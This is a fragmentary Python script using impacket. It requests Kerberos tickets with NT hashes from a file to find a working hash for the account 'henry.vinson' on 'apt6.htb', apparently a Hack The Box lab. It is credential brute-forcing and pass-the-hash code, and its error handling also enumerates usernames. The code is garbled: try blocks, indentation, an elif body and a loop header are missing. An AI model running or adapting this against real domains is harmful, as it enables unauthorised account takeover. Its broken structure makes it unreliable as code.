from __future__ import division
from __future__ import print_function
from impacket.smbconnection import SMBConnection
from impacket import smbconnection
from binascii import unhexlify
from impacket.krb5.kerberosv5 import getKerberosTGT, KerberosError
from impacket.krb5 import constants
from impacket.krb5.types import Principal
def gethost_addrinfo(hostname):
for res in socket.getaddrinfo(hostname, None, socket.AF_INET6,
socket.SOCK_DGRAM, socket.IPPROTO_IP, socket.AI_CANONNAME):
af, socktype, proto, canonname, sa = res
for res in socket.getaddrinfo(hostname, None, socket.AF_INET,
socket.SOCK_DGRAM, socket.IPPROTO_IP, socket.AI_CANONNAME):
af, socktype, proto, canonname, sa = res
def _login(username, password, domain, lmhash, nthash, aesKey, dc_ip):
dc_ip = gethost_addrinfo(dc_ip)
kerb_principal = Principal(username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
getKerberosTGT(kerb_principal, password, domain,
unhexlify(lmhash), unhexlify(nthash), aesKey, dc_ip)
print('[+] Success %s/%s' % (domain, username) )
except KerberosError as e:
if (e.getErrorCode() == constants.ErrorCodes.KDC_ERR_C_PRINCIPAL_UNKNOWN.value) or (e.getErrorCode() == constants.ErrorCodes.KDC_ERR_CLIENT_REVOKED.value) or (e.getErrorCode() == constants.ErrorCodes.KDC_ERR_WRONG_REALM.value):
print("[-]Could not find username: %s/%s" % (domain, username) )
elif e.getErrorCode() == constants.ErrorCodes.KDC_ERR_PREAUTH_FAILED.value:
except socket.error as e:
print('[-]Could not connect to DC')
USERNAME = 'henry.vinson'
def login(username, hash):
return _login(username, '', DOMAIN, '', hash, None, "apt6.htb")
passwords = [x.strip() for x in open("hashes.txt").readlines()]
print(f"[+] Success {x}")